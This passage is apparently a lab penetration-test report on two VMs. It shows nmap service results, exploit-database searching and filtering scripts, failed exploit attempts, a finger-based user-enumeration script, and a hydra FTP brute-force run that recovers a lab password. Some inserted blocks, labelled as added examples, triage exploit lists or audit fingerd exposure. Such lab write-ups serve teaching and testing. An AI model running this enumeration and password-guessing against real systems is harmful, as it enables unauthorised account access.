All UDP services except port 631 were fingerprinted. Ports 123, 162 and 631
answered none of nmap's probes and are therefore reported as open|filtered;
the ntp and snmptrap names for 123 and 162 come from nmap's port table rather
than from a response.
bt linux # nmap -sU -sV --version-all -n -p7,13,37,111,123,161,162,631,683 192.168.1.200
Starting Nmap 4.60 ( http://nmap.org ) at 2009-01-20 12:54 GMT
Interesting ports on 192.168.1.200:
PORT    STATE         SERVICE  VERSION
7/udp   open          echo
13/udp  open          daytime
37/udp  open          time     (32 bits)
111/udp open          rpcbind  2 (rpc #100000)
123/udp open|filtered ntp
161/udp open          snmp     SNMPv1 server (public)
162/udp open|filtered snmptrap
631/udp open|filtered unknown
683/udp open          rquotad  1-2 (rpc #100011)
MAC Address: 00:0C:29:27:60:0A (VMware)
Service detection performed. Please report any incorrect results at
http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.467 seconds
From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
TCP services:
7/tcp      echo
21/tcp     ftp            vsftpd 1.1.3
22/tcp     ssh            OpenSSH 3.5p1 (protocol 1.99)
23/tcp     telnet         Linux telnetd
79/tcp     finger         Linux fingerd
80/tcp     http           Apache httpd 2.0.40 (Red Hat Linux)
109/tcp    POSSIBLY pop2
110/tcp    pop3           ipopd 2001.78rh
111/tcp    rpcbind        2 (rpc #100000)
143/tcp    imap           UW Imapd 2001.315rh
199/tcp    smux           Linux SNMP multiplexer
443/tcp    ssl/http       Apache httpd 2.0.40 (Red Hat Linux)
686/tcp    rquotad        1-2 (rpc #100011)
993/tcp    imaps
995/tcp    pop3s
6000/tcp   X11
32768/tcp  status         1 (rpc #100024)
32770/tcp  mountd         1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
7/udp      echo
13/udp     daytime
37/udp     time           (32 bits)
111/udp    rpcbind        2 (rpc #100000)
123/udp    ntp
161/udp    snmp           SNMPv1 server (public)
162/udp    snmptrap
631/udp    unknown
683/udp    rquotad        1-2 (rpc #100011)
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:
22/tcp     ssh            OpenSSH 4.3 (protocol 2.0)
111/tcp    rpcbind        2 (rpc #100000)
939/tcp    status         1 (rpc #100024)

B. Sites used during the exploit research phase


There are various sites available for researching software exploits. While
the following list is not all-inclusive, it does provide fairly good
coverage:
- http://www.milw0rm.com - Exploit database.
- http://secwatch.org/ - Exploit database.
- http://packetstormsecurity.org - Exploit database.
- http://www.securityforest.com/ - Exploit database and securityforest exploit update script.
- http://anyside.org/ - Exploit database.
- http://www.remote-exploit.org/ - Contains back|track, milw0rm and securityfocus exploit update scripts.
- http://www.brandonhutchinson.com/ - Contains packetstormsecurity exploit update script.
- http://www.governmentsecurity.org/exploits.php - Exploit information.
- http://insecure.org/sploits.html - Exploit information.
- http://www.securiteam.com/exploits/ - Exploit information.
- http://www.iss.net/ - Exploit information.
- http://www.hoobie.net/security/exploits/ - Exploit information.
- http://www.vupen.com/exploits/ - Archive of private exploits and proof-of-concept code developed by VUPEN Security.
- http://www.security-protocols.com - Security advisories.
- http://metasploit.org - Exploit platform.
- http://www.malware.com/ - Exploit information.
- http://www.immunitysec.com/index.shtml - Exploit platform.
- http://www.datastronghold.com - Exploit information and hacking techniques.
- http://www.illmob.org/ - Exploit information.

C. Remote exploits
i. Research via anyside.org
A list of exploits was downloaded from the anyside.org web site. The
list consisted of a small description of the exploit and a link to the
source code for the exploit. A list of search items was then created
based upon the findings from the scanning phase.
$ cat ../commands/remote-search.txt
apache
finger
imap
ipop
ntp
open ssh
openssh
rpc
rpcbind
rpcmount
rpcstatus
rquota
snmp
snmptrap
telnet
vs ftp
vsftp
x11

The search-item list and the exploit list were combined to produce a list of
possible remote exploits for the cptvm1 host: lines whose path contains
exploits/remote are kept, then filtered to whole-word, case-insensitive
matches of any search item, de-duplicated and sorted.
$ grep exploits\/remote exploits_list.txt | grep -w -i -f ../commands/remote-search.txt | sort -u > possible_remote_200.txt
$ ll
total 1664
drwxr-xr-x  6 matt matt    204 Feb 21 14:46 ./
drwxr-xr-x 16 matt matt    544 Feb 21 14:46 ../
-rw-r--r--  1 matt matt 126720 Feb  6 14:40 exploits_list.db.tgz
-rw-r--r--  1 matt matt 702666 Sep 21 05:52 exploits_list.txt
-rw-r--r--  1 matt matt   9376 Feb  6 14:43 possible_remote_200.txt
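The grep above keeps every line that mentions a search term, which is why the result set below is dominated by Windows, Mercury and Snort entries that cannot apply to a Linux target. The following Python is an added example, not part of the original report: it performs the same whole-word keyword match, drops entries that name another platform, reads any version bound stated directly after the service name ("Apache <= 2.0.52", "Apache < 1.3.37, 2.0.59, 2.2.3") and compares it with the version nmap reported for cptvm1, and ranks DoS-only entries last. The list embedded in it is constructed from the entries shown above plus one made-up local entry; the keyword table, regexes and function names are the example's own.

```python
import re

# Constructed sample in the anyside.org list format (date;url;description), taken from the
# grep output above except for the last line, which is made up to show the remote/local filter.
SAMPLE_LIST = """\
....;http://www.anyside.org/exp/exploits/remote/09.16.MS03-039-exp.c;Remote Windows exploit for the RPC DCOM long filename heap overflow discovered by NSFOCUS.
....;http://www.anyside.org/exp/exploits/remote/ADMmountd.c;ADM mountd exploit - Linux rpc.mountd 2.2beta29 remote root exploit
....;http://www.anyside.org/exp/exploits/remote/OpenFuckV2.c;Remote exploit for Apache + OpenSSL v0.9.6d and below.
....;http://www.anyside.org/exp/exploits/remote/apache-squ1rt.c;Apache <= 2.0.52 HTTP GET Remote Denial of Service Exploit
2003-9-18;http://www.anyside.org/exp/exploits/remote/mounty.c;Remote root exploit for rpc.mountd that makes use of the xlog off-by-one vulnerability
2006-08-21;http://www.anyside.org/exp/exploits/remote/2006082105.txt;Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
2006-09-27;http://www.anyside.org/exp/exploits/remote/2006092701.txt;OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
2008-01-01;http://www.anyside.org/exp/exploits/local/example-local.c;Constructed entry: a local exploit that must not appear in the remote list
"""

# Services seen on cptvm1 and the version nmap reported (None where it reported no version).
CPTVM1_KEYWORDS = {
    "apache": "2.0.40", "openssh": "3.5p1", "vsftpd": "1.1.3", "imap": "2001.315rh",
    "mountd": None, "rpc": None, "telnet": None, "finger": None, "snmp": None,
}

REMOTE = re.compile(r"/exploits/remote/")
NOISE = re.compile(r"\b(windows|win32|win2k3?|winxp|ms0\d|solaris)\b", re.I)   # not a Linux target
DOS = re.compile(r"\b(denial of service|dos)\b", re.I)
VERSION = r"\d+(?:\.\d+)+"


def version_tuple(v):
    return tuple(int(x) for x in re.findall(r"\d+", v))


def cmp_versions(a, b):
    """-1, 0 or 1 comparing dotted versions numerically ('3.5p1' -> (3, 5, 1)), zero-padded."""
    ta, tb = version_tuple(a), version_tuple(b)
    n = max(len(ta), len(tb))
    ta, tb = ta + (0,) * (n - len(ta)), tb + (0,) * (n - len(tb))
    return (ta > tb) - (ta < tb)


def pick_bound(bounds, observed):
    """Given several branch bounds ('1.3.37, 2.0.59, 2.2.3'), use the one on the observed branch."""
    obs = version_tuple(observed)

    def shared_prefix(b):
        t, n = version_tuple(b), 0
        while n < min(len(t), len(obs)) and t[n] == obs[n]:
            n += 1
        return n
    return max(bounds, key=shared_prefix)


def version_in_scope(keyword, observed, text):
    """True/False when the description states a bound for this keyword that the observed version
    does or does not fall under; None when no bound follows the keyword or no version was observed."""
    if observed is None:
        return None
    kw = re.escape(keyword)
    m = re.search(rf"\b{kw}\b\s*(<=?)\s*v?({VERSION}(?:,\s*{VERSION})*)", text, re.I)
    if m:
        op, bounds = m.group(1), [b.strip() for b in m.group(2).split(",")]
        c = cmp_versions(observed, pick_bound(bounds, observed))
        return c < 0 if op == "<" else c <= 0
    m = re.search(rf"\b{kw}\b\s*v?({VERSION})\s+and\s+(?:earlier|below)", text, re.I)
    if m:
        return cmp_versions(observed, m.group(1)) <= 0
    return None


def triage(listing, keywords):
    """Keep remote entries that mention a target service, drop other-platform noise, and rank:
    in-scope code execution first, unknown version next, DoS and ruled-out entries last."""
    hits = []
    for line in listing.splitlines():
        parts = line.split(";", 2)
        if len(parts) != 3 or not REMOTE.search(parts[1]):
            continue
        date, url, desc = parts
        text = f"{url} {desc}"
        matched = [k for k in keywords if re.search(rf"\b{re.escape(k)}\b", text, re.I)]
        if not matched or NOISE.search(text):
            continue
        scope = [version_in_scope(k, keywords[k], desc) for k in matched]
        hits.append({
            "date": date, "url": url, "keywords": matched,
            "dos": bool(DOS.search(desc)),
            "version_ok": any(s is True for s in scope),
            "ruled_out": all(s is False for s in scope),
        })
    hits.sort(key=lambda h: (h["dos"], h["ruled_out"], not h["version_ok"]))
    return hits


if __name__ == "__main__":
    for h in triage(SAMPLE_LIST, CPTVM1_KEYWORDS):
        flags = ("DoS " if h["dos"] else "") + ("version-match" if h["version_ok"] else "")
        print(f"{h['url'].rsplit('/', 1)[1]:<28} {', '.join(h['keywords']):<16} {flags}")
```

The version heuristic only reads a bound that directly follows the service name, so an entry such as the Apache + OpenSSL one above stays "unknown" rather than being wrongly ruled out; every candidate still has to be read before it is compiled and run.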

$ cat possible_remote_200.txt
....;http://www.anyside.org/exp/exploits/remote/09.16.MS03-039-exp.c;Remote
Windows exploit for the RPC DCOM long filename heap overflow discovered by
NSFOCUS. Related advisory
....;http://www.anyside.org/exp/exploits/remote/101_ncat.c;MailEnable , IMAP
Service, Remote Buffer Overflow Exploit v0.4

....;http://www.anyside.org/exp/exploits/remote/ADMmountd.c;ADM mountd exploit


- Linux rpc.mountd 2.2beta29 remote root exploit
....;http://www.anyside.org/exp/exploits/remote/DComExpl_UnixWin32.zip;Windows
port of the remote exploit utilizing the DCOM RPC overflow originally coded by
H D Moore.
....;http://www.anyside.org/exp/exploits/remote/Mercury-IMAP-exp.txt;Exploit
code for the Mercury32 IMAP Rename buffer overflow
....;http://www.anyside.org/exp/exploits/remote/MercuryMail-exp.txt;Mercury
Mail 4.01 (Pegasus) IMAP Buffer Overflow
....;http://www.anyside.org/exp/exploits/remote/OpenFuckV2.c;Remote exploit
for Apache + OpenSSL v0.9.6d and below. This exploit is based upon the
openssl-too-open exploit by Solar Eclipse and offers more than 130 targets
including various flavors of Linux.
....;http://www.anyside.org/exp/exploits/remote/apache-squ1rt.c;Apache <=
2.0.52 HTTP GET Remote Denial of Service Exploit
....;http://www.anyside.org/exp/exploits/remote/apache_xpl.txt;Apache 2.0.52
and earlier DoS
....;http://www.anyside.org/exp/exploits/remote/dcom.c;Remote exploit
utilizing the DCOM RPC overflow discovered by LSD. Includes targets for
Windows 2000 and XP. Binds a shell on port 4444.
....;http://www.anyside.org/exp/exploits/remote/getusr.c;Exploit that makes
use of the mod_userdir vulnerability in various Apache 1.3 and 2.x servers.
....;http://www.anyside.org/exp/exploits/remote/httpdDoS-pl.txt;Denial of
service test exploit for the flaw in Apache httpd 2.0.49
....;http://www.anyside.org/exp/exploits/remote/ipswitch.c;Ipswitch IMAP
Server "LOGIN" Command Remote Stack Overflow Exploit
....;http://www.anyside.org/exp/exploits/remote/m00-apache-w00t.tar.gz;Apache
1.3.*-2.0.48 remote users disclosure exploit - Checks Apache webservers for a
wrong default configuration of mod_userdir which allows account name guessing
and then attempts to login to the found accounts with ftp. Effective against
Linux and *BSD boxes.
....;http://www.anyside.org/exp/exploits/remote/rpc!exec.c;Windows remote rpc
dcom exploit which bypasses non-executable stack protection by using return
into libc. Tested against OverflowGuard and StackDefender (with kernel32
imagebase randomization) running on Windows 2000 SP0 and Windows XP SP0.
....;http://www.anyside.org/exp/exploits/remote/telnet.c;Solaris 2.6, 7, and 8
telnetd remote exploit.
....;http://www.anyside.org/exp/exploits/remote/wgetusr.c;Exploit that makes
use of the mod_userdir vulnerability in various Apache 1.3 and 2.x servers.
2003-12-8;http://www.anyside.org/exp/exploits/remote/m00-apache-w00t.c;Apache
1.3.*-2.0.48 mod_userdir remote users disclosure Exploit
2003-4-1;http://www.anyside.org/exp/exploits/remote/rpcexp.c;Microsoft Windows
RPC Locator Service remote exploit. Binds cmd.exe to port 5151. Tested again
Windows 2000 SP3 and Windows NT 4 SP6a.
2003-9-18;http://www.anyside.org/exp/exploits/remote/mounty.c;Remote root
exploit for rpc.mountd that makes use of the xlog off-by-one vulnerability
discussed
2004-1-4;http://www.anyside.org/exp/exploits/remote/wts_bo.c;Jordan Windows Telnet Server v1.2 remote buffer overflow exploit. Binds a shell on port 9191. Tested on Win32 and Unix.
2004-4-25;http://www.anyside.org/exp/exploits/remote/lsasrv.c;Windows Lsasrv.dll RPC ms04011 buffer overflow Remote Exploit
2004-5-2;http://www.anyside.org/exp/exploits/remote/HOD-ms04011-lsasrvexpl.c;MS04011 Lsasrv.dll RPC buffer overflow remote exploit
2004-9-24;http://www.anyside.org/exp/exploits/remote/mdaemon_imap.c;Remote buffer overflow in MDaemon IMAP and SMTP server
2004-9-3;http://www.anyside.org/exp/exploits/remote/sm00nycourier_imap_fsx.c;Courier-IMAP <= 3.0.2-r1 auth_debug() Remote Format String Exploit
2005-03-17;http://www.anyside.org/exp/exploits/remote/goodtech.c;GoodTech Telnet Server < 5.0.7 Remote Buffer Overflow Exploit
2005-04-25;http://www.anyside.org/exp/exploits/remote/goodtech_expl.c;GoodTech Telnet Server < 5.0.7 Remote BoF Exploit
2005-04-30;http://www.anyside.org/exp/exploits/remote/Snmppd.c;Snmppd SNMP proxy daemon format string exploit
2005-06-07;http://www.anyside.org/exp/exploits/remote/2005060701.txt;IPSwitch IMAP Server LOGON Remote Stack Overflow
2005-09-20;http://www.anyside.org/exp/exploits/remote/2005092001.txt;Mercury Mail <= 4.01a (Pegasus) IMAP Buffer Overflow Exploit
2006-03-10;http://www.anyside.org/exp/exploits/remote/2006031002.txt;Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service
2006-03-19;http://www.anyside.org/exp/exploits/remote/2006031901.txt;Mercur Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit
2006-03-19;http://www.anyside.org/exp/exploits/remote/2006031903.txt;Mercur Mailserver 5.0 SP3 (IMAP) Denial of Service Exploit
2006-06-05;http://www.anyside.org/exp/exploits/remote/2006060506.txt;Linux Kernel < 2.6.16.18 (Netfilter NAT SNMP Module) Remote DoS Exploit
2006-07-23;http://www.anyside.org/exp/exploits/remote/2006072301.txt;Apache Tomcat < 5.5.17 Remote Directory Listing Vulnerability
2006-08-21;http://www.anyside.org/exp/exploits/remote/2006082105.txt;Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
2006-09-11;http://www.anyside.org/exp/exploits/remote/2006091101.txt;Mercur Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit (2)
2006-09-27;http://www.anyside.org/exp/exploits/remote/2006092701.txt;OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
2007-01-15;http://www.anyside.org/exp/exploits/remote/2007011502.txt;Mercur Messaging 2005 IMAP Remote Buffer Overflow Exploit
2007-02-01;http://www.anyside.org/exp/exploits/remote/2007020107.txt;CA BrightStor ARCserve 11.5.2.0 (catirpc.dll) RPC Server DoS Exploit
2007-02-23;http://www.anyside.org/exp/exploits/remote/2007022306.txt;Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow DoS Exploit
2007-03-01;http://www.anyside.org/exp/exploits/remote/2007030102.txt;Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit
2007-03-10;http://www.anyside.org/exp/exploits/remote/2007031002.txt;MS Windows DCE-RPC svcctl ChangeServiceConfig2A() Memory Corruption
2007-03-21;http://www.anyside.org/exp/exploits/remote/2007032101.txt;Mercur Messaging 2005 <= SP4 IMAP Remote Exploit (egghunter mod)
2007-03-21;http://www.anyside.org/exp/exploits/remote/2007032101.txt;Mercur Messaging 2005 IMAP (SUBSCRIBE) Remote Exploit (win2k SP4)
2007-03-24;http://www.anyside.org/exp/exploits/remote/2007032401.txt;Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit
2007-03-30;http://www.anyside.org/exp/exploits/remote/2007033002.txt;Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit (linux)
2007-04-07;http://www.anyside.org/exp/exploits/remote/2007040701.txt;Apache Mod_Rewrite Off-by-one Remote Overflow Exploit (win32)
2007-04-15;http://www.anyside.org/exp/exploits/remote/2007041501.txt;MS Windows DNS RPC Remote Buffer Overflow Exploit (port 445)
2007-05-26;http://www.anyside.org/exp/exploits/remote/2007052601.txt;Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
2007-05-30;http://www.anyside.org/exp/exploits/remote/2007053001.txt;Eudora 7.1.0.9 (IMAP FLAGS) Remote SEH Overwrite Exploit 0day
2007-06-22;http://www.anyside.org/exp/exploits/remote/2007062201.txt;Apache mod_jk 1.2.19/1.2.20 Remote Buffer Overflow Exploit
2007-07-08;http://www.anyside.org/exp/exploits/remote/2007070801.txt;Apache Tomcat Connector (mod_jk) Remote Exploit (exec-shield)
2007-09-03;http://www.anyside.org/exp/exploits/remote/2007090301.txt;CCProxy <= v6.2 Telnet Proxy Ping Overflow Exploit (meta)
2007-10-14;http://www.anyside.org/exp/exploits/remote/2007101401.txt;Apache Tomcat (webdav) Remote File Disclosure Exploit
2007-10-21;http://www.anyside.org/exp/exploits/remote/2007102101.txt;Apache Tomcat (webdav) Remote File Disclosure Exploit (ssl support)
2007-12-18;http://www.anyside.org/exp/exploits/remote/2007121805.txt;MS Windows Message Queuing Service RPC BOF Exploit (MS07-065)
2008-04-04;http://www.anyside.org/exp/exploits/remote/2008040401.txt;Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit (meta)
2008-04-06;http://www.anyside.org/exp/exploits/remote/2008040601.txt;Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit
2008-06-30;http://www.anyside.org/exp/exploits/remote/2008063003.txt;Surgemail 39e-1 Post Auth IMAP Remote Buffer Overflow DoS
2008-07-17;http://www.anyside.org/exp/exploits/remote/2008071701.txt;Debian OpenSSH Remote SELinux Privilege Elevation Exploit (auth)
2008-07-17;http://www.anyside.org/exp/exploits/remote/2008071702.txt;Bea Weblogic Apache Connector Code Exec / Denial of Service Exploit
2008-07-18;http://www.anyside.org/exp/exploits/remote/2008071801.txt;Apache mod_jk 1.2.19 Remote Buffer Overflow Exploit (win32)
2008-08-11;http://www.anyside.org/exp/exploits/remote/2008081101.txt;Apache Tomcat <= 6.0.18 UTF8 Directory Traversal Vulnerability
2008-09-05;http://www.anyside.org/exp/exploits/remote/2008090501.txt;MicroTik RouterOS <= 3.13 SNMP write (Set request) PoC
2008-09-05;http://www.anyside.org/exp/exploits/remote/2008090503.txt;MicroTik RouterOS <= 3.13 SNMP write (Set request) PoC

While this list looks impressive in length, removing the exploits that do not
match the operating system, the installed software or its version, or that do
not provide a privilege escalation leaves only 3 exploits:
....;http://www.anyside.org/exp/exploits/remote/ADMmountd.c;ADM mountd exploit - Linux rpc.mountd 2.2beta29 remote root exploit
....;http://www.anyside.org/exp/exploits/remote/OpenFuckV2.c;Remote exploit for Apache + OpenSSL v0.9.6d and below. This exploit is based upon the openssl-too-open exploit by Solar Eclipse and offers more than 130 targets including various flavors of Linux.
20050430;http://www.anyside.org/exp/exploits/remote/Snmppd.c;Snmppd SNMP proxy daemon format string exploit
ii. Exploits round 1
The 3 exploits found were downloaded and reviewed. The following lists the
exploits in the order they were attempted (from most to least likely to work).

- Snmppd SNMP proxy daemon format string exploit.
  Reviewing the source code for this exploit reveals that it appears to match
  all of the required criteria. The code was successfully compiled after making
  major modifications to the source to fix syntax issues due to line
  wrapping/formatting defects. The execution of the exploit was unsuccessful.

- Remote exploit for Apache + OpenSSL v0.9.6d and below.
  While the Apache version matches perfectly, the kernel version 2.4.20-8 is
  more commonly associated with a Red Hat 9.0 installation than with a Red Hat
  8.0 installation. The code was successfully compiled after making minor
  modifications to the source to provide missing openssl include files. The
  execution of the exploit was unsuccessful.

- ADM mountd exploit - Linux rpc.mountd 2.2beta29 remote root exploit.
  Reviewing the code for this exploit reveals that it was written in 1998, so
  the possibility of it succeeding was deemed very slim. The exploit was
  successfully compiled after making minor modifications to the source to fix
  syntax issues due to line wrapping/formatting defects. The execution of the
  exploit was unsuccessful.
iii. Research via secwatch.org
Having exhausted the exploits known to the anyside.org site, the
secwatch.org site was used to continue the search. The search results
were quite extensive compared to the anyside.org list. However, the
only additional exploit located was the UW imapd IMAP 4.1 server.
iv. Exploits round 2
After quite an extensive review of possible exploits, only one additional
exploit was located: the UW imapd IMAP 4.1 server exploit.

- UW imapd IMAP 4.1 server.
  This exploit is meant for the 2001.315 version of the uw-imapd service. The
  service was fingerprinted as UW Imapd 2001.315rh. The rh addition to the
  version may indicate that Red Hat has applied a patch to resolve the
  vulnerability. The code was successfully compiled without issues. The
  execution of the exploit was unsuccessful.

D. User discovery
i. Abuse of finger
The finger service running on port 79/tcp provides us with the ability to
brute force user names on the cptvm1 host. To accomplish this, a shell script
executing finger over a list of user names was implemented. The list of user
names was generated by googling for a list of common user names. The VM
running back|track3 did not have a proper finger client installed, so this
command was executed from the host machine under OSX.
The names of 18 users on the cptvm1 host were discovered. Reviewing the output
from the finger command reveals that of the 18 user accounts, only the root,
user and postgres users have the ability to log in to a standard shell.
$ cat fingerListOfUserNames.sh
#!/bin/bash
# usage: fingerListOfUserNames.sh <host> <file with one user name per line>
while read userName; do
    finger "${userName}@$1" >> "usersOn$1_RAW.txt"
done < "$2"

# drop the "finger: ..." error lines and the "[host]" banner lines
sed -e '/^finger:/d' -e "/^\[$1/d" "usersOn$1_RAW.txt" > "usersOn$1_FOUND.txt"

# keep the login name from each "Login:" line, de-duplicated
awk '/^Login:/ { print $2 }' "usersOn$1_FOUND.txt" | sort -u > "usersOn$1.txt"
$ fingerListOfUserNames.sh 192.168.1.200 usernames.txt
$ ls -alF
total 96
drwxr-xr-x   7 matt matt    238 Feb 11 22:23 ./
drwxr-xr-x  11 matt matt    374 Feb 10 19:12 ../
-rwxr-xr-x   1 matt matt    291 Feb 11 22:06 fingerListOfUserNames.sh*
-rw-r--r--   1 matt matt   3550 Feb 10 19:31 usernames.txt
-rw-r--r--   1 matt matt    107 Feb 11 22:06 usersOn192.168.1.200.txt
-rw-r--r--   1 matt matt   4699 Feb 11 21:46 usersOn192.168.1.200_FOUND.txt
-rw-r--r--   1 matt matt  26235 Feb 11 21:46 usersOn192.168.1.200_RAW.txt

$ cat usersOn192.168.1.200.txt
adm
apache
daemon
ftp
lp
mail
nfsnobody
nobody
nscd
operator
postgres
root
rpc
rpcuser
sshd
user
uucp
vcsa
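
The long-format finger output collected in the _RAW file also carries each account's login shell, which is how the three shell-capable accounts above were identified. The following script is an added example, not part of the report, that summarises such output the way an administrator checking what fingerd discloses to anonymous clients would; the sample output is constructed in the Linux fingerd format and the account names are taken from the list above.

```shell
#!/bin/bash
# Added example, not from the report: summarise what fingerd discloses per account.
# The sample below is constructed in the long format a Linux fingerd returns for
# "finger name@host"; the account names mirror the ones the report found.
sample_finger_output() {
  cat <<'EOF'
Login: root                             Name: root
Directory: /root                        Shell: /bin/bash
Never logged in.
No mail.
No Plan.

Login: postgres                         Name: PostgreSQL Server
Directory: /var/lib/pgsql               Shell: /bin/bash
Never logged in.
No mail.
No Plan.

Login: apache                           Name: Apache
Directory: /var/www                     Shell: /sbin/nologin
Never logged in.
No mail.
No Plan.

Login: user                             Name: user
Directory: /home/user                   Shell: /bin/bash
Last login Wed Feb 11 22:06 (EST) on pts/0
No mail.
No Plan.

Login: sshd                             Name: Privilege-separated SSH
Directory: /var/empty/sshd              Shell: /sbin/nologin
Never logged in.
No mail.
No Plan.
EOF
}

# Read finger output on stdin and print one line per account:
#   <login> <shell> <interactive|nologin> <last-login-disclosed:yes|no>
# "interactive" means the shell is not one of the usual non-login shells,
# i.e. the account can be used for an interactive session.
summarize_finger() {
  awk '
    function emit() {
      if (login != "") {
        kind = (shell ~ /\/(nologin|false|sync|halt|shutdown)$/) ? "nologin" : "interactive"
        printf "%s %s %s %s\n", login, shell, kind, (lastlogin ? "yes" : "no")
      }
      login = ""; shell = "?"; lastlogin = 0
    }
    /^Login:/     { emit(); login = $2 }
    /Shell:/      { shell = $NF }
    /^Last login/ { lastlogin = 1 }
    END           { emit() }
  '
}

# Just the accounts that can actually log in: the ones whose exposure through
# fingerd matters most, and the ones a lockout policy has to cover.
interactive_accounts() {
  summarize_finger | awk '$3 == "interactive" { print $1 }'
}

sample_finger_output | summarize_finger
```

Run against the report's usersOn<host>_RAW.txt it gives the same three accounts, plus the last-login times fingerd hands out without authentication; disabling fingerd (or blocking 79/tcp) removes the disclosure entirely.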

From the information gathered during this step, the systems of interest are
configured as follows:
cptvm1 (192.168.1.200)
Operating system: Linux
Kernel version: 2.4.20-8
TCP ports: 7, 21, 22, 23, 79, 80, 109, 110, 111, 143, 199, 443, 686, 993, 995, 6000, 32768, 32770
TCP services:
  7/tcp      echo
  21/tcp     ftp        vsftpd 1.1.3
  22/tcp     ssh        OpenSSH 3.5p1 (protocol 1.99)
  23/tcp     telnet     Linux telnetd
  79/tcp     finger     Linux fingerd
  80/tcp     http       Apache httpd 2.0.40 (Red Hat Linux)
  109/tcp    POSSIBLY pop2
  110/tcp    pop3       ipopd 2001.78rh
  111/tcp    rpcbind    2 (rpc #100000)
  143/tcp    imap       UW Imapd 2001.315rh
  199/tcp    smux       Linux SNMP multiplexer
  443/tcp    ssl/http   Apache httpd 2.0.40 (Red Hat Linux)
  686/tcp    rquotad    1-2 (rpc #100011)
  993/tcp    imaps
  995/tcp    pop3s
  6000/tcp   X11
  32768/tcp  status     1 (rpc #100024)
  32770/tcp  mountd     1-3 (rpc #100005)
UDP ports: 7, 13, 37, 111, 123, 161, 162, 631, 683
UDP services:
  7/udp      echo
  13/udp     daytime
  37/udp     time (32 bits)
  111/udp    rpcbind    2 (rpc #100000)
  123/udp    ntp
  161/udp    snmp       SNMPv1 server (public)
  162/udp    snmptrap
  631/udp    unknown
  683/udp    rquotad    1-2 (rpc #100011)
User accounts: adm, apache, daemon, ftp, lp, mail, nfsnobody, nobody, nscd,
operator, postgres, root, rpc, rpcuser, sshd, user, uucp, vcsa
cptvm2 (192.168.1.104)
Operating system: Linux
Kernel version: Linux 2.6.9 - 2.6.23
TCP ports: 22, 111, 939
TCP services:
  22/tcp     ssh        OpenSSH 4.3 (protocol 2.0)
  111/tcp    rpcbind    2 (rpc #100000)
  939/tcp    status     1 (rpc #100024)

E. Brute force password guessing
i. Discovery of password for user account
As the various remote exploits were unsuccessful, a brute force attack against
the passwords of the user and postgres accounts was attempted. Typically,
password guessing against user accounts is stifled by configuration items such
as locking an account after it exceeds a maximum number of login attempts, or
imposing an exponentially increasing delay between invalid login attempts. In
the case of the ftp service listening on port 21/tcp, neither of these
techniques was applied. The hydra utility was selected as it accepts a list of
user names, a list of passwords and the protocol to be used. The user accounts
file was populated with the accounts configured to log in to a standard shell.
The root user was removed from the list as the ftp service did not allow root
logins. The passwords list was located by googling for a list of the most
commonly used passwords.
The result of this attack was the discovery of the password, digital, for the
user account. The credentials were validated by sshing into the cptvm1 host.
An attempt to log in to the cptvm2 host with the same user name and password
was unsuccessful.
bt user # cat usernames/cptvm1.users.txt
user
postgres
bt user # hydra -e n -L usernames/cptvm1.users.txt -P passwords/passwords.txt 192.168.1.200 ftp
Hydra v5.4 (c) 2006 by van Hauser / THC - use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2009-01-27 22:57:29
[DATA] 16 tasks, 1 servers, 139758 login tries (l:2/p:69879), ~8734 tries per task
[DATA] attacking service ftp on port 21
[STATUS] 402.00 tries/min, 402 tries in 00:01h, 139356 todo in 05:47h
[STATUS] 402.00 tries/min, 1206 tries in 00:03h, 138552 todo in 05:45h
[STATUS] 404.71 tries/min, 2833 tries in 00:07h, 136925 todo in 05:39h
[STATUS] 405.60 tries/min, 6084 tries in 00:15h, 133674 todo in 05:30h
[STATUS] 406.06 tries/min, 12588 tries in 00:31h, 127170 todo in 05:14h
[STATUS] 406.21 tries/min, 19092 tries in 00:47h, 120666 todo in 04:58h
[STATUS] 406.27 tries/min, 25595 tries in 01:03h, 114163 todo in 04:42h
[21][ftp] host: 192.168.1.200
login: user
password: digital
[STATUS] 406.33 tries/min, 32100 tries in 01:19h, 107658 todo in 04:25h
[STATUS] 406.34 tries/min, 38602 tries in 01:35h, 101156 todo in 04:09h
[STATUS] 406.36 tries/min, 45106 tries in 01:51h, 94652 todo in 03:53h
[STATUS] 406.40 tries/min, 51613 tries in 02:07h, 88145 todo in 03:37h
[STATUS] 406.43 tries/min, 58119 tries in 02:23h, 81639 todo in 03:21h
[STATUS] 406.46 tries/min, 64627 tries in 02:39h, 75131 todo in 03:05h
[STATUS] 406.47 tries/min, 71133 tries in 02:55h, 68625 todo in 02:49h
[STATUS] 406.49 tries/min, 77639 tries in 03:11h, 62119 todo in 02:33h
[STATUS] 406.50 tries/min, 84145 tries in 03:27h, 55613 todo in 02:17h
[STATUS] 406.53 tries/min, 90656 tries in 03:43h, 49102 todo in 02:01h
[STATUS] 406.53 tries/min, 97160 tries in 03:59h, 42598 todo in 01:45h
[STATUS] attack finished for 192.168.1.200 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2009-01-28 03:05:41
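
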